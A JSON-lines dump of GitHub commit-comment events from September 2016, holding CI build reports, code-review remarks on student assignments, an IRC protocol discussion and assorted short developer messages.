{"id":"4600167590","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124267,"position":null,"line":null,"path":null,"commit_id":"97d4bf4587a4590db4273d5da9798afc6dbaaf0f","created_at":"2016-09-22T03:05:35Z","updated_at":"2016-09-22T03:05:35Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T03:05:35Z"}
{"id":"4600167683","type":"CommitCommentEvent","actor":{"login":"kaganjd"},"repo":{"name":"kaganjd/p5.js-web-editor"},"payload":{"comment":{"id":19124268,"position":null,"line":null,"path":null,"commit_id":"4119d91812c6adcf13a297ac256811a5bbc7cd62","created_at":"2016-09-22T03:05:38Z","updated_at":"2016-09-22T03:05:38Z","body":"SketchList.js and SketchListView.js are really similar. Need both? What is SketchListView.js?"}},"created_at":"2016-09-22T03:05:38Z"}
{"id":"4600172444","type":"CommitCommentEvent","actor":{"login":"MinkeAnn"},"repo":{"name":"schoerg/yowsup"},"payload":{"comment":{"id":19124281,"position":null,"line":null,"path":null,"commit_id":"42261bf5aaa09db195d02e363c8eb1c6070822ca","created_at":"2016-09-22T03:07:44Z","updated_at":"2016-09-22T03:07:44Z","body":"how to fix error no 13 about permission edit wa version ?"}},"created_at":"2016-09-22T03:07:44Z"}
{"id":"4600173335","type":"CommitCommentEvent","actor":{"login":"dhoer"},"repo":{"name":"fastlaneit/chef-nexus3"},"payload":{"comment":{"id":19124282,"position":null,"line":null,"path":null,"commit_id":"f76d0ce9dc7f64e120861b54522113f5f366936c","created_at":"2016-09-22T03:08:10Z","updated_at":"2016-09-22T03:08:10Z","body":"Just curious if setting url attribute to `file:///tmp/nexus.tgz` would accomplish the same thing?"}},"created_at":"2016-09-22T03:08:10Z"}
{"id":"4600180897","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19124296,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-22T03:10:48Z","updated_at":"2016-09-22T03:10:48Z","body":"THIS IS MUCH NICER THAN MY SOLUTION.\r\n\r\n@bitwalker \r\n\r\nAlso I think it's wrong though.  Per the RFC, it seems that the nick shouldn't have been sent at all.  Consequently, this **should** on normal IRC servers probably be what happens, with the args being `[channel, topic]`.  I haven't confirmed it, but I just did a solid read-through of the spec and don't understand why the nick is in that message in the first place.\r\n\r\nAs far as I can tell, both my solution to this and yours lead to dropping **properly-formed** topic replies.  I don't think we can tell on this one post-parsing - the way to see a 332 is invalid is that the first colon in the parameters has no characters after it.\r\n\r\nCorrect me if I'm wrong.  I just don't think the nick is supposed to be sent in a 332 anyway.  Haven't tested this against any Real Actual IRC Servers That Aren't Crazy Slack Bridges yet though."}},"created_at":"2016-09-22T03:10:48Z"}
{"id":"4600194562","type":"CommitCommentEvent","actor":{"login":"joyfromcal"},"repo":{"name":"joyfromcal/Test1"},"payload":{"comment":{"id":19124315,"position":null,"line":null,"path":null,"commit_id":"1c1c0de73cb500f2cbeecb92e5f552f9d804aac5","created_at":"2016-09-22T03:16:18Z","updated_at":"2016-09-22T03:16:18Z","body":"This is another test after Branching. "}},"created_at":"2016-09-22T03:16:18Z"}
{"id":"4600195379","type":"CommitCommentEvent","actor":{"login":"gpiraja"},"repo":{"name":"gpiraja/tutorial_git"},"payload":{"comment":{"id":19124317,"position":null,"line":null,"path":null,"commit_id":"02dd86afc5527fd0f6ce9a7e8366649e92d71ccc","created_at":"2016-09-22T03:16:36Z","updated_at":"2016-09-22T03:16:36Z","body":"é isoo"}},"created_at":"2016-09-22T03:16:36Z"}
{"id":"4600197342","type":"CommitCommentEvent","actor":{"login":"daxtens"},"repo":{"name":"daxtens/patchwork"},"payload":{"comment":{"id":19124319,"position":null,"line":null,"path":null,"commit_id":"88af79565e9bc85f587c076ed6eddb692f48b02e","created_at":"2016-09-22T03:17:27Z","updated_at":"2016-09-22T03:17:27Z","body":"ikr. wat do?"}},"created_at":"2016-09-22T03:17:27Z"}
{"id":"4600201019","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19124327,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-22T03:18:56Z","updated_at":"2016-09-22T03:18:56Z","body":"Just a note, I connected to freenode and I can see that they send the nick on 332 as well.  No clue where I'm misreading the spec but now I'll dig in further :)"}},"created_at":"2016-09-22T03:18:56Z"}
{"id":"4600202122","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"JustinNix/Prac7"},"payload":{"comment":{"id":19124330,"position":9,"line":12,"path":"car.py","commit_id":"37ae1daad0b6e72b74327f0aa13ea0cac03ece62","created_at":"2016-09-22T03:19:22Z","updated_at":"2016-09-22T03:19:22Z","body":"These should just be `name`"}},"created_at":"2016-09-22T03:19:22Z"}
{"id":"4600203133","type":"CommitCommentEvent","actor":{"login":"edilsalvador"},"repo":{"name":"PLMCSIT/LexiCom"},"payload":{"comment":{"id":19124333,"position":null,"line":null,"path":null,"commit_id":"11673cb146b61fb1b1a2b97790fc1783ae6aeb59","created_at":"2016-09-22T03:19:48Z","updated_at":"2016-09-22T03:19:48Z","body":"Removed Unnecessary Libraries, Comments and Codes. "}},"created_at":"2016-09-22T03:19:48Z"}
{"id":"4600203911","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"JustinNix/Prac7"},"payload":{"comment":{"id":19124335,"position":6,"line":6,"path":"guitars.py","commit_id":"37ae1daad0b6e72b74327f0aa13ea0cac03ece62","created_at":"2016-09-22T03:20:10Z","updated_at":"2016-09-22T03:20:10Z","body":"What's this? Where did you learn this bad practice?\r\nJust use our standard while loop format and ask for name before you use it in a condition."}},"created_at":"2016-09-22T03:20:10Z"}
{"id":"4600205856","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"JustinNix/Prac7"},"payload":{"comment":{"id":19124337,"position":9,"line":9,"path":"guitars.py","commit_id":"37ae1daad0b6e72b74327f0aa13ea0cac03ece62","created_at":"2016-09-22T03:20:54Z","updated_at":"2016-09-22T03:20:54Z","body":"See the control lecture notes that explain if you need an if to break out, that should just be your condition. This is week 1 and 2 stuff."}},"created_at":"2016-09-22T03:20:54Z"}
{"id":"4600208310","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19124344,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-22T03:21:52Z","updated_at":"2016-09-22T03:21:52Z","body":"aha:\r\n\r\n```\r\nMost of the messages sent to the server generate a reply of some\r\nsort.  The most common reply is the numeric reply, used for both\r\nerrors and normal replies.  The numeric reply MUST be sent as one\r\nmessage consisting of the sender prefix, the three-digit numeric, and\r\nthe target of the reply.\r\n^^^^^^^^^^^^^^^^^^^^^^^ that's the reason\r\n```"}},"created_at":"2016-09-22T03:21:52Z"}
{"id":"4600208496","type":"CommitCommentEvent","actor":{"login":"MistrFahrenheit"},"repo":{"name":"interface-student-sites/interface-student-sites.github.io"},"payload":{"comment":{"id":19124346,"position":null,"line":null,"path":null,"commit_id":"da7e0bec2e0d32484976018f8532298d93766ebb","created_at":"2016-09-22T03:21:56Z","updated_at":"2016-09-22T03:21:56Z","body":"9/21"}},"created_at":"2016-09-22T03:21:56Z"}
{"id":"4600209633","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"bitwalker/exirc"},"payload":{"comment":{"id":19124350,"position":null,"line":null,"path":null,"commit_id":"daf1bef3a4dca08fdd589d2980a52a09883251f2","created_at":"2016-09-22T03:22:27Z","updated_at":"2016-09-22T03:22:27Z","body":"So yeah, ignore me.  This seems like a legit fix indeed.  But now it makes me want to write a parser for IRC messages for some dumb reason."}},"created_at":"2016-09-22T03:22:27Z"}
{"id":"4600212200","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"JustinNix/Prac7"},"payload":{"comment":{"id":19124359,"position":9,"line":9,"path":"programminglanguage.py","commit_id":"37ae1daad0b6e72b74327f0aa13ea0cac03ece62","created_at":"2016-09-22T03:23:32Z","updated_at":"2016-09-22T03:23:32Z","body":"Good"}},"created_at":"2016-09-22T03:23:32Z"}
{"id":"4600216837","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"JustinNix/Prac7"},"payload":{"comment":{"id":19124375,"position":6,"line":16,"path":"guitar.py","commit_id":"0d95764203332106d4e4c7c960b2e1803b3e4afe","created_at":"2016-09-22T03:25:39Z","updated_at":"2016-09-22T03:25:39Z","body":"\"is\" implies that it should return a Boolean - and it should.\r\nHow will you use `if guitar.is_vintage():` now? You can't.\r\nThis is returning like __str__ might. \r\nThe \"vintage\" display is not something the class/object is responsible for. That's for the client code to do."}},"created_at":"2016-09-22T03:25:39Z"}
{"id":"4600222719","type":"CommitCommentEvent","actor":{"login":"veloai"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19124384,"position":16,"line":16,"path":"01-if(1).html","commit_id":"a29432b40eb521feb9fe52b7fc08b8b98d7d2b0e","created_at":"2016-09-22T03:28:03Z","updated_at":"2016-09-22T03:28:03Z","body":"commit"}},"created_at":"2016-09-22T03:28:03Z"}
{"id":"4600225900","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19124391,"position":27,"line":74,"path":"index.php","commit_id":"56682808e71a1ea8d565650111ae332a8a1e4528","created_at":"2016-09-22T03:29:31Z","updated_at":"2016-09-22T03:29:31Z","body":"指定したページ数が、存在するページ数よりも大きかったら困るので"}},"created_at":"2016-09-22T03:29:31Z"}
{"id":"4600227012","type":"CommitCommentEvent","actor":{"login":"veloai"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19124395,"position":null,"line":null,"path":null,"commit_id":"a29432b40eb521feb9fe52b7fc08b8b98d7d2b0e","created_at":"2016-09-22T03:30:00Z","updated_at":"2016-09-22T03:30:00Z","body":"@JeonGiHyeon to jeongitub"}},"created_at":"2016-09-22T03:30:00Z"}
{"id":"4600227776","type":"CommitCommentEvent","actor":{"login":"JeonGiHyeon"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19124398,"position":null,"line":null,"path":null,"commit_id":"a29432b40eb521feb9fe52b7fc08b8b98d7d2b0e","created_at":"2016-09-22T03:30:18Z","updated_at":"2016-09-22T03:30:18Z","body":"가나다라마바사아아아아아"}},"created_at":"2016-09-22T03:30:18Z"}
{"id":"4600228168","type":"CommitCommentEvent","actor":{"login":"veloai"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19124399,"position":null,"line":null,"path":null,"commit_id":"a29432b40eb521feb9fe52b7fc08b8b98d7d2b0e","created_at":"2016-09-22T03:30:26Z","updated_at":"2016-09-22T03:30:26Z","body":"# # # # @\r\n\r\n- \r\n\r\n- [ ] dfe\r\n\r\n- [ ] e\r\n\r\n- [ ] efg\r\n\r\n- [ ] \r\n\r\nase\r\n\r\n1. "}},"created_at":"2016-09-22T03:30:26Z"}
{"id":"4600228635","type":"CommitCommentEvent","actor":{"login":"veloai"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19124401,"position":null,"line":null,"path":null,"commit_id":"a29432b40eb521feb9fe52b7fc08b8b98d7d2b0e","created_at":"2016-09-22T03:30:36Z","updated_at":"2016-09-22T03:30:36Z","body":"아니 위에\r\n\r\n코드안에다가\r\n"}},"created_at":"2016-09-22T03:30:36Z"}
{"id":"4600229735","type":"CommitCommentEvent","actor":{"login":"adsr13"},"repo":{"name":"estesgirl016/spots"},"payload":{"comment":{"id":19124407,"position":null,"line":null,"path":null,"commit_id":"9e2aaa791f27bd3c596f762d645f2a99fd6beb3b","created_at":"2016-09-22T03:31:06Z","updated_at":"2016-09-22T03:31:06Z","body":"when site is tested on mobile environment using inspector I notices that 'Logo' was center and the menu didn't collapse showing the hamburger icon on the left. I made my own branch without fixing the collapse issue, but I did add an extra divider in the dropdown so it would look more balanced just in case we keep it. \r\n![screen shot 2016-09-21 at 9 29 25 pm](https://cloud.githubusercontent.com/assets/8008703/18736276/abfa933e-8042-11e6-9539-2fcfdb2dae3b.png)\r\n"}},"created_at":"2016-09-22T03:31:06Z"}
{"id":"4600233498","type":"CommitCommentEvent","actor":{"login":"PKPenguin321"},"repo":{"name":"Cuboos/-tg-station"},"payload":{"comment":{"id":19124421,"position":null,"line":null,"path":null,"commit_id":"4c9463d2a47293d3a933829699ee56cc3c64c029","created_at":"2016-09-22T03:32:44Z","updated_at":"2016-09-22T03:32:44Z","body":"Hahaha what you put your change log in the example template and now you're deleting the whole thing???\r\n\r\nSomebody help this man"}},"created_at":"2016-09-22T03:32:44Z"}
{"id":"4600235576","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19124424,"position":17,"line":64,"path":"index.php","commit_id":"56682808e71a1ea8d565650111ae332a8a1e4528","created_at":"2016-09-22T03:33:40Z","updated_at":"2016-09-22T03:33:40Z","body":"指定したページ数が、存在するページ数よりも少なかったら困るので"}},"created_at":"2016-09-22T03:33:40Z"}
{"id":"4600237217","type":"CommitCommentEvent","actor":{"login":"tej19852003"},"repo":{"name":"tej19852003/Tejas_Test"},"payload":{"comment":{"id":19124428,"position":null,"line":null,"path":null,"commit_id":"7363dc328076bc4a8072677f104fe503077cfbad","created_at":"2016-09-22T03:34:23Z","updated_at":"2016-09-22T03:34:23Z","body":"just added flight1"}},"created_at":"2016-09-22T03:34:23Z"}
{"id":"4600238168","type":"CommitCommentEvent","actor":{"login":"andyp13"},"repo":{"name":"andyp13/Autonomous-Vehicle-Project"},"payload":{"comment":{"id":19124431,"position":null,"line":null,"path":null,"commit_id":"50d1f6b5428daccd952cbf220f8882e5a3f9363e","created_at":"2016-09-22T03:34:49Z","updated_at":"2016-09-22T03:34:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;FZnXxbDT&#x2F;5-log-compass-values\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Log compass values</a>"}},"created_at":"2016-09-22T03:34:49Z"}
{"id":"4600240781","type":"CommitCommentEvent","actor":{"login":"rongxike"},"repo":{"name":"fordth/jinqJs"},"payload":{"comment":{"id":19124438,"position":null,"line":null,"path":null,"commit_id":"789558db82ff0f112acf0f80dcd3bb0906f2db9b","created_at":"2016-09-22T03:36:03Z","updated_at":"2016-09-22T03:36:03Z","body":"no, it's sum, avg, max, min if numbers are string format. above script returned a weird result. I updated a script as below link\r\nhttps://github.com/rongxike/jinqJs-string-number_solved\r\n\r\n"}},"created_at":"2016-09-22T03:36:03Z"}
{"id":"4600241211","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"shashwat-vik/scrap-preprocessor"},"payload":{"comment":{"id":19124439,"position":7,"line":163,"path":"geocodertest.py","commit_id":"061a4690950b46c16292d647b3b7065ed10af9ff","created_at":"2016-09-22T03:36:14Z","updated_at":"2016-09-22T03:36:14Z","body":"Though try-except will work, it's better to write if else in such cases. Try except causes an exception chain thus more overhead."}},"created_at":"2016-09-22T03:36:14Z"}
{"id":"4600241699","type":"CommitCommentEvent","actor":{"login":"phuens"},"repo":{"name":"COMP215/_phuens"},"payload":{"comment":{"id":19124440,"position":null,"line":null,"path":null,"commit_id":"d239b4ddcde7d92aa11f5b24a8472b28ab152b76","created_at":"2016-09-22T03:36:26Z","updated_at":"2016-09-22T03:36:26Z","body":"Lab 4: Binary search tree and Linked List\r\n"}},"created_at":"2016-09-22T03:36:26Z"}
{"id":"4600242303","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"shashwat-vik/scrap-preprocessor"},"payload":{"comment":{"id":19124445,"position":34,"line":208,"path":"geocodertest.py","commit_id":"061a4690950b46c16292d647b3b7065ed10af9ff","created_at":"2016-09-22T03:36:42Z","updated_at":"2016-09-22T03:36:42Z","body":"Please use more intuitive name of variable."}},"created_at":"2016-09-22T03:36:42Z"}
{"id":"4600242448","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124446,"position":null,"line":null,"path":null,"commit_id":"97d4bf4587a4590db4273d5da9798afc6dbaaf0f","created_at":"2016-09-22T03:36:45Z","updated_at":"2016-09-22T03:36:45Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-22T03:36:45Z"}
{"id":"4600246973","type":"CommitCommentEvent","actor":{"login":"PureWeen"},"repo":{"name":"domaven/xamarin-plugins"},"payload":{"comment":{"id":19124457,"position":null,"line":null,"path":null,"commit_id":"74ec1dc4e3413869e315ab0188772323ed9f5c18","created_at":"2016-09-22T03:38:53Z","updated_at":"2016-09-22T03:38:53Z","body":"Yea it is..  My package versions got all messed up somehow. I was trying to update google play services to 29.0.0.2 and Xamarin studio kept telling me there was an incompatibility with the geofences plugin...  But I think  it was due to some circular weirdness with the Forms.Applinks plugin which requires 29.0.0.1... I uninstalled Forms.Applinks and then everything worked. It's kind of a confusing story and not really that important :-)\r\n\r\nOne thing to note is that upon upgrading to 29.0.0.2 I started getting exceptions in release mode from some stuff probably being linked out.  I only had this plugin installed into a secondary DLL and not my main project. Once I added this plugin into the main project I stopped getting the exception.\r\n"}},"created_at":"2016-09-22T03:38:53Z"}
{"id":"4600247856","type":"CommitCommentEvent","actor":{"login":"mrclay"},"repo":{"name":"Elgg/elgg-scripts"},"payload":{"comment":{"id":19124459,"position":null,"line":null,"path":null,"commit_id":"35920440ba9fb4daa552d03a4357fc0861bedfe0","created_at":"2016-09-22T03:39:18Z","updated_at":"2016-09-22T03:39:18Z","body":"Not a bug. Intended (but new!) behavior because we don't have a lock file. https://github.com/Elgg/starter-project/issues/37"}},"created_at":"2016-09-22T03:39:18Z"}
{"id":"4600250378","type":"CommitCommentEvent","actor":{"login":"erhlee-bird"},"repo":{"name":"trailofbits/remill"},"payload":{"comment":{"id":19124464,"position":null,"line":null,"path":null,"commit_id":"c11df91c069459e92bba2cc83dff98e140d43d0f","created_at":"2016-09-22T03:40:25Z","updated_at":"2016-09-22T03:40:25Z","body":"@pgoodman\r\n\r\nI think I managed to follow along accordingly compared to other instructions. Let me know what you think.\r\nAlso, I didn't include this in Instructions.cpp for now."}},"created_at":"2016-09-22T03:40:25Z"}
{"id":"4600252471","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"yasu80/dotfiles"},"payload":{"comment":{"id":19124471,"position":null,"line":null,"path":null,"commit_id":"1cf9ea575ba99450b7311cbacb43382d6626e361","created_at":"2016-09-22T03:41:24Z","updated_at":"2016-09-22T03:41:24Z","body":"Hey @yasu80 \r\nGit のエイリアスはGit 側でするのをお勧めするぜ！"}},"created_at":"2016-09-22T03:41:24Z"}
{"id":"4600254749","type":"CommitCommentEvent","actor":{"login":"erhlee-bird"},"repo":{"name":"trailofbits/remill"},"payload":{"comment":{"id":19124478,"position":null,"line":null,"path":null,"commit_id":"c11df91c069459e92bba2cc83dff98e140d43d0f","created_at":"2016-09-22T03:42:28Z","updated_at":"2016-09-22T03:42:28Z","body":"The different PUNPCK's can be generalized, but I didn't know how to generalize the macros like UExtractV8."}},"created_at":"2016-09-22T03:42:28Z"}
{"id":"4600255011","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-responsive"},"payload":{"comment":{"id":19124479,"position":318,"line":318,"path":"Assignment 7/starter_code/css/style.css","commit_id":"0edabe75b0652b8ee36c4f7bf34ff4a99c2dcaca","created_at":"2016-09-22T03:42:34Z","updated_at":"2016-09-22T03:42:34Z","body":"Nice job using responsive units throughout!"}},"created_at":"2016-09-22T03:42:34Z"}
{"id":"4600261171","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-responsive"},"payload":{"comment":{"id":19124494,"position":16,"line":321,"path":"Assignment 7/starter_code/css/style.css","commit_id":"2904395476103f18686b9140909964f625f3815a","created_at":"2016-09-22T03:45:26Z","updated_at":"2016-09-22T03:45:26Z","body":"Nice job trouble shooting this and using the specificity to make it responsive!"}},"created_at":"2016-09-22T03:45:26Z"}
{"id":"4600264443","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-responsive"},"payload":{"comment":{"id":19124502,"position":null,"line":null,"path":null,"commit_id":"0edabe75b0652b8ee36c4f7bf34ff4a99c2dcaca","created_at":"2016-09-22T03:46:56Z","updated_at":"2016-09-22T03:46:56Z","body":"Your code is looking great! If you would like to challenge yourself further perhaps try attempting the mobile nav 👍 "}},"created_at":"2016-09-22T03:46:56Z"}
{"id":"4600266946","type":"CommitCommentEvent","actor":{"login":"CheckYourScreen"},"repo":{"name":"NachiketNamjoshi/BlackReactor_onyx"},"payload":{"comment":{"id":19124510,"position":null,"line":null,"path":null,"commit_id":"3bfeb8ff50043e7164a5033ef083958a6be56c03","created_at":"2016-09-22T03:48:02Z","updated_at":"2016-09-22T03:48:02Z","body":"Ofast: Optimize even more than O3, including optimizations that can generate incorrect code even for standards-compliant software. Most notably, this disables IEEE-compliant floating point. "}},"created_at":"2016-09-22T03:48:02Z"}
{"id":"4600268007","type":"CommitCommentEvent","actor":{"login":"psilo909"},"repo":{"name":"smarthomeNG/smarthome"},"payload":{"comment":{"id":19124512,"position":null,"line":null,"path":null,"commit_id":"c3e223c1c64bb68ee39a76f54d3209357fbd76b3","created_at":"2016-09-22T03:48:29Z","updated_at":"2016-09-22T03:48:29Z","body":"@ohinckel its just about the writing \"Neu Laden\" in Capital letters? \"Speichern\" is ok?\r\ni will change that the next days, but prefer to keep both words. the capital letters seem to be a \"Flüchtigkeitsfehler\", as in english you write a title in capital letters :) but thats German.. my mistake"}},"created_at":"2016-09-22T03:48:29Z"}
{"id":"4600273595","type":"CommitCommentEvent","actor":{"login":"pedroivo000"},"repo":{"name":"pedroivo000/BioreactorBrain"},"payload":{"comment":{"id":19124519,"position":null,"line":null,"path":null,"commit_id":"c6c8aec23d9eaba2f7f8c9d3d034925113f9778d","created_at":"2016-09-22T03:51:00Z","updated_at":"2016-09-22T03:51:00Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;U1IeFpoK&#x2F;4-pad-control-using-relay-board\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Pad control using relay board</a>"}},"created_at":"2016-09-22T03:51:00Z"}
{"id":"4600275189","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19124523,"position":null,"line":null,"path":null,"commit_id":"9f90a9906f4194c9e3120d9c5c6e1a975ce5a100","created_at":"2016-09-22T03:51:47Z","updated_at":"2016-09-22T03:51:47Z","body":"TaskCluster: @cgsheeh does not have permission to trigger tasks."}},"created_at":"2016-09-22T03:51:47Z"}
{"id":"4600279112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124533,"position":null,"line":null,"path":null,"commit_id":"f2ac9522781cf1a560bb935d4e333fba72de3778","created_at":"2016-09-22T03:53:38Z","updated_at":"2016-09-22T03:53:38Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-MacOS-10.9-clang: OK (2331 of 2334 tests passed, 1 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T03:53:38Z"}
{"id":"4600282293","type":"CommitCommentEvent","actor":{"login":"html1602"},"repo":{"name":"html1602/9.22-11-44"},"payload":{"comment":{"id":19124541,"position":8,"line":8,"path":"index.html","commit_id":"2a07173ab533e3e38a7d37862f6676f7e7ab8bc4","created_at":"2016-09-22T03:55:05Z","updated_at":"2016-09-22T03:55:05Z","body":"<div></div>"}},"created_at":"2016-09-22T03:55:05Z"}
{"id":"4600282632","type":"CommitCommentEvent","actor":{"login":"html1602"},"repo":{"name":"html1602/9.22-11-44"},"payload":{"comment":{"id":19124542,"position":8,"line":8,"path":"index.html","commit_id":"2a07173ab533e3e38a7d37862f6676f7e7ab8bc4","created_at":"2016-09-22T03:55:14Z","updated_at":"2016-09-22T03:55:14Z","body":"111"}},"created_at":"2016-09-22T03:55:14Z"}
{"id":"4600283348","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19124544,"position":null,"line":null,"path":null,"commit_id":"413ed79ec54f3a754ac8bc57c1d29835d17bd274","created_at":"2016-09-22T03:55:33Z","updated_at":"2016-09-22T03:55:33Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-22T03:55:33Z"}
{"id":"4600287045","type":"CommitCommentEvent","actor":{"login":"makyiox"},"repo":{"name":"makyiox/Qt360"},"payload":{"comment":{"id":19124547,"position":21,"line":20,"path":"src/safe/safewidget.h","commit_id":"a6ad04f33f33344212ea29c86d2a2db3d300c901","created_at":"2016-09-22T03:57:16Z","updated_at":"2016-09-22T03:57:16Z","body":"1"}},"created_at":"2016-09-22T03:57:16Z"}
{"id":"4600292408","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"beagleboard/beagleboard-xm"},"payload":{"comment":{"id":19124556,"position":null,"line":null,"path":null,"commit_id":"53f2a0e97dd8e80e9fecee636aad47369c3866a6","created_at":"2016-09-22T03:59:38Z","updated_at":"2016-09-22T03:59:38Z","body":"This wasn't actually a rotation. Not exactly sure of the delta."}},"created_at":"2016-09-22T03:59:38Z"}
{"id":"4600295730","type":"CommitCommentEvent","actor":{"login":"alextricity25"},"repo":{"name":"rcbops/rpc-openstack"},"payload":{"comment":{"id":19124572,"position":1,"line":1,"path":"scripts/alarmparser.py","commit_id":"9f2f24a3fa3fd028885828cfaf4759cc9bdf9281","created_at":"2016-09-22T04:00:49Z","updated_at":"2016-09-22T04:00:49Z","body":"Did you seriously make a parser for the alarm language? Boss.\r\nYou're going to have to show me this trick later ;)"}},"created_at":"2016-09-22T04:00:49Z"}
{"id":"4600297916","type":"CommitCommentEvent","actor":{"login":"DrewML"},"repo":{"name":"fkling/astexplorer"},"payload":{"comment":{"id":19124574,"position":1,"line":1,"path":"src/parsers/js/transformers/jscodeshift/codeExample.txt","commit_id":"13c2d5db93d59bf51a78335d8c2c84f4a1ae1a3f","created_at":"2016-09-22T04:01:46Z","updated_at":"2016-09-22T04:01:46Z","body":"💯💯💯"}},"created_at":"2016-09-22T04:01:46Z"}
